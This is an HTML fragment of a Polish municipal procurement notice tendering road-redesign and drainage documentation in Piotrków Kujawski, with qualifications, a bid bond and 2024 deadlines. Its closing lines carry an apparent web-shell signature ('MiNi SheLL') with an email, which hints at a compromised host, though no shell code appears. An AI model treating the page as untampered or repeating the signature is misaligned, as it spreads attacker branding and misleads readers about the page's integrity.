.<br/>2.	Przedmiot zamówienia obejmuje wykonanie kompletnego opracowania projektu budowlano-wykonawczego przebudowy w/w drogi wraz z odwodnieniem ( wykonanie kanalizacji deszczowej). <br/>3.	Wykonawca przedstawi Zamawiającemu do zaakceptowania proponowaną koncepcję przebudowy ulic lub uzgodni z Zamawiającym zakres opracowania w terminie do 2 miesięcy od podpisania umowy.<br/>4. Dokumentacja na w/w zakres winna składać się z niżej wymienionych elementów:<br/>a)	Mapa do celów projektowych (1 egz. z klauzulą dla Zamawiającego + egzemplarze dla potrzeb projektowania),<br/>b)	Projekt budowlany w tym: projekt zagospodarowania terenu, projekt architektoniczno-budowlany, projektu technicznego, załączników do projektu budowlanego (opinii, uzgodnień, pozwoleń, oświadczeń, informacji i innych dokumentów), (5 egz.),<br/>c)	Projekt techniczny (5 egz.),<br/>d)	Operat wodnoprawny – jeżeli dotyczy (4 egz.),<br/>e)	Projekt stałej organizacji ruchu (4 egz.),<br/>f)	Specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdej branży (2 egz.),<br/>g)	Przedmiar robót oraz kosztorys ofertowy dla każdej branży z podziałem na 2 etapy (2 egz.),<br/>h)	Kosztorys inwestorski dla każdej branży z podziałem na 2 etapy (2 egz.),<br/>i)	Wniosek o wydanie pozwolenia na budowę (1 komplet),<br/>j)	uzyskanie i zbiór niezbędnych badań, opinii, uzgodnień, zgód, pozwoleń i decyzji a także innych dokumentów technicznych związanych z inwestycją (element składowy projektu budowlanego) niezbędnych do uzyskania pozwolenia na budowę ( np.: złożenie wniosku i uzyskanie decyzji o warunkach zabudowy lub decyzji o lokalizacji inwestycji celu publicznego, decyzji środowiskowej, pozwoleń i zgód wodno-prawnych, itp.)<br/>k)	Wykonawca dostarczy także Zamawiającemu kompletną dokumentację zarchiwizowaną na płytach CD/DVD lub pendrive w dwóch egzemplarzach. <br/>5.	Zakres zadań będących przedmiotem zamówienia dodatkowo obejmuje:<br/>a)Udzielania pisemnych wyjaśnień na zapytanie oferentów w sprawach opracowanej dokumentacji kosztorysowej oraz sprawdzenie kosztorysów ofertowych w złożonych ofertach w trakcie prowadzonego później postępowania przetargowego na wybór wykonawcy robót obejmujących swym zakresem opracowana dokumentację.<br/>b)Współpracę realizacyjną z Wykonawcą i inspektorem nadzoru inwestorskiego do czasu zakończenia robót budowlanych. <br/>6.	Wykonawca zobowiązuje się zrealizować przedmiot zamówienia zgodnie z warunkami wynikającymi z obowiązujących przepisów prawa, wymaganiami wynikającymi z obowiązujących Polskich Norm i aprobat technicznych zasadami rzetelnej wiedzy technicznej i ustalonymi zwyczajami.<br/><br/>II.	Przed przystąpieniem do projektowania Wykonawca dokona, przy udziale Zamawiającego, wizji w terenie.<br/>III.	Wykonawca pozyska we własnym zakresie wszelkie niezbędne materiały potrzebne do opracowania dokumentacji projektowo-kosztorysowej.<br/>IV.	Sporządzona dokumentacja musi zawierać wymagane uzgodnienia urzędowe i branżowe.<br/>V.	Wykonawca dokona, w ramach wynagrodzenia o którym mowa w § 5, uzgodnień branżowych z gestorami sieci zlokalizowanych na terenach objętych dokumentacjami w granicach projektowanego pasa drogowego, w tym uzgodnień na Naradzie Koordynacyjnej, o której mowa w art. 28b ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne.<br/>VI.	Rozwiązania przyjęte w dokumentacjach oraz zaproponowane do zastosowania urządzenia będą musiały odpowiadać wymogom zapewnienia dostępności osobom ze szczególnymi potrzebami.<br/>VII.	W przypadku konieczności uzyskania innych materiałów niezbędnych do opracowania dokumentacji projektowej bądź uzyskania nie wymienionych warunków, opracowań, pozwoleń, operatów, uzgodnień, opinii, zatwierdzeń Wykonawca zobowiązany jest je pozyskać na własny koszt.<br/>VIII. Wersja elektroniczna musi zawierać w szczególności wszystkie elementy projektu budowlanego. <br/>IX.	Wykonawca razem z dokumentacją elektroniczną złoży oświadczenie o zgodności wersji elektronicznej z przekazaną wersją oryginalną (papierową). <br/>X.	Dokumentacja stanowiąca przedmiot umowy, będzie zaopatrzona w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że jest wykonana zgodnie z umową, obowiązującymi przepisami i normami, jest wzajemnie skoordynowana technicznie we wszystkich branżach oraz, że została wydana w stanie kompletnym z punktu widzenia celu, któremu ma służyć oraz, że wszelkie zmiany i uwagi wniesione na etapie uzgodnień zostały do niej wprowadzone. <br/>XI.	Wykonawca zobowiązany będzie do uzupełnienia i poprawienia egzemplarzy niestanowiących załączników do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej, w zakresie odpowiadającym zmianom dokonanym w dokumentacjach na etapie uzyskiwania ww. decyzji.<br/>XII.	W zależności od zaproponowanych przez Wykonawcę rozwiązań technicznych, wykonanie dokumentacji wymagać będzie również uzyskania przez niego warunków od dostawców mediów. <br/>XIII.	W dokumentacji projektowo-kosztorysowej wykonanej przez Wykonawcę, nie mogą występować nazwy własne materiałów, zgodnie z zasadą, że przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy &#34;lub równoważny&#34; oraz minimalne parametry równoważności.<br/><br/>2. Wspólny Słownik Zamówień CPV: 71320000-7 Usługi inżynieryjne w zakresie projektowania. <br/>3. Zamawiający dopuszcza możliwość składania ofert częściowych.<br/>Zamawiający dopuszcza możliwość składania ofert częściowych. Zamówienie składa się z 2 części.<br/>Wykonawca może złożyć ofertę na jedną lub dowolną ilość części wskazanych w SWZ.<br/>4. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych.<br/>5. Zamawiający nie przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>6. Szczegółowy opis oraz sposób realizacji zamówienia zawiera SWZ.<br/>Przedmiot zamówienia można opisać przez wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jeżeli zamawiający nie może opisać przedmiotu zamówienia w wystarczająco precyzyjny i zrozumiały sposób, a wskazaniu takiemu towarzyszą wyrazy &#34;lub równoważny&#34;.<br/>7. Jeżeli udostępniona dokumentacja wskazywałyby w odniesieniu do materiałów lub urządzeń lub rozwiązań znaki towarowe, patenty lub pochodzenie, źródło lub lub usługi dostarczane przez konkretnego wykonawcę, szczególny proces, który charakteryzuje produkty dostarczane przez konkretnego wykonawcę, to zgodnie z art. 99 ust. 5 PZP Zamawiający dopuszcza każdorazowo zaoferowanie materiałów lub urządzeń lub rozwiązań równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego. Pod pojęciem „minimalne parametry jakościowe i cechy użytkowe” zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte dokumentacji przetargowej, a w przypadku ich braku w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Posługiwanie się przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie każdorazowo produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. Zamawiający zastrzega sobie możliwość uzyskania opinii projektanta dokumentacji odnośnie równoważności zaproponowanego przez Wykonawcę materiału lub urządzenia lub rozwiązania. W przypadku, gdy oferowane przez wykonawcę materiały lub urządzenia będą inne niż opisane w dokumentacji, obowiązek udowodnienia, że odpowiadają one wymaganiom, określonym przez Zamawiającego w dokumentacji, spoczywa na Wykonawcy. <br/>8. Uwagi końcowe<br/>a)	dokumentacje projektowe należy opracować zgodnie i w oparciu o obowiązujące akty prawne, normy, normatywy i wytyczne projektowe, <br/>b)	przed przystąpieniem do projektowania Wykonawca dokona wizji w terenie, <br/>c)	Wykonawca pozyska we własnym zakresie wszelkie niezbędne materiały potrzebne do opracowania dokumentacji, <br/>d)	dokumentacje będą musiały zawierać wymagane uzgodnienia urzędowe i branżowe, <br/>e)	Wykonawca dokona na własny koszt uzgodnień branżowych z gestorami sieci zlokalizowanych na terenach objętych dokumentacjami w granicach projektowanego pasa drogowego, w tym uzgodnień na Naradzie Koordynacyjnej, o której mowa w art. 28b ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne, <br/>f)	rozwiązania przyjęte w dokumentacjach oraz zaproponowane do zastosowania urządzenia będą musiały odpowiadać wymogom zapewnienia dostępności osobom ze szczególnymi potrzebami, <br/>g)	Wykonawca zapewni na swój koszt sprawdzenie projektów pod względem zgodności z przepisami, o którym mowa w art. 20 ust. 2-3 ustawy z dnia 7 lipca 1994 r. Prawo budowlane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Nadzór autorski (ilość pobytów)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, co najmniej 2 usługi, polegające na opracowaniu dokumentacji projektowo – kosztorysowej,<br/>obejmującej swoim zakresem zaprojektowanie rozbudowy, budowy albo przebudowy dróg o wartości nie mniejszej niż<br/>65000,00 zł. brutto każda;<br/>b) dysponuje wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub przedstawi pisemne<br/>zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej osób, przewidzianych do realizacji zamówienia,<br/>które będą uczestniczyły w realizacji zamówienia i będą odpowiedzialne za projektowanie, zgodnie z dyspozycją art. 12<br/>ustawy z dnia 7 lipca 1994 roku – Prawo budowlane, Zamawiający dopuszcza uprawnienia wydane obywatelom państw<br/>Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą z dnia 22 grudnia 2015 roku o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej:<br/>− projektant branży drogowej – 1 osoba posiadająca uprawnienia budowlane do projektowania w specjalności drogowej,<br/>które pozwalają na wykonywanie czynności będących przedmiotem zamówienia niezależnie od momentu ich wydania;<br/>− projektant branży sanitarnej – 1 osoba posiadająca uprawnienia budowlane do projektowania w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń kanalizacyjnych, które pozwalają na wykonywanie czynności będących przedmiotem<br/>zamówienia niezależnie od momentu ich wydania;<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust. 2 - zgodnie z<br/>Załącznikiem nr 7 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenie<br/>wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik<br/>nr 4 do SWZ;<br/>b) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>− art. 108 ust. 1 ustawy PZP,<br/>− art. 109 ust. 1 pkt 5 i pkt 7 ustawy PZP, według wzoru z załącznika nr 8 do SWZ;<br/>c) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 7 ust. 1 ustawy z dnia 15<br/>kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835), według wzoru z załącznika nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – według wzoru stanowiącego<br/>załącznik nr 5 do SWZ;<br/>b) wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należy-cie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy – według wzoru stanowiącego załącznik nr 9 do SWZ,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w wysokości:<br/>	- 2.000,00 PLN (słownie: dwa tysiące złotych 00/100) dla pierwszej części zamówienia<br/>	- 1.500,00 PLN (słownie: jeden tysiąc pięćset złotych 00/100) dla drugiej części zamówienia <br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wniesione w:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b pomoc finansowa udzielana przez Agencję ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3. Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy Urzędu Miasta i Gminy w Piotrkowie Kujawskim BS Piotrków Kujawski nr 07 9551 0002 0000 0101 2003 0011 z dopiskiem : Wadium na: Wykonanie dokumentacji projektowej - wpisując część zamówienia, którego wadium dotyczy. <br/>Kopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.<br/>4. Wadium w formie poręczeń i gwarancji, o których mowa w pkt. 2 ppkt 2-4 powinno jako beneficjenta wskazywać Gminę Miasto i Gminę Piotrków Kujawski, 88-230 Piotrków Kujawski, ul. Kościelna 1 <br/>5. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w pkt. 3, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt. 2 ppkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym w Projekcie Umowy, stanowiącym Załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://piotrkowkujawski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com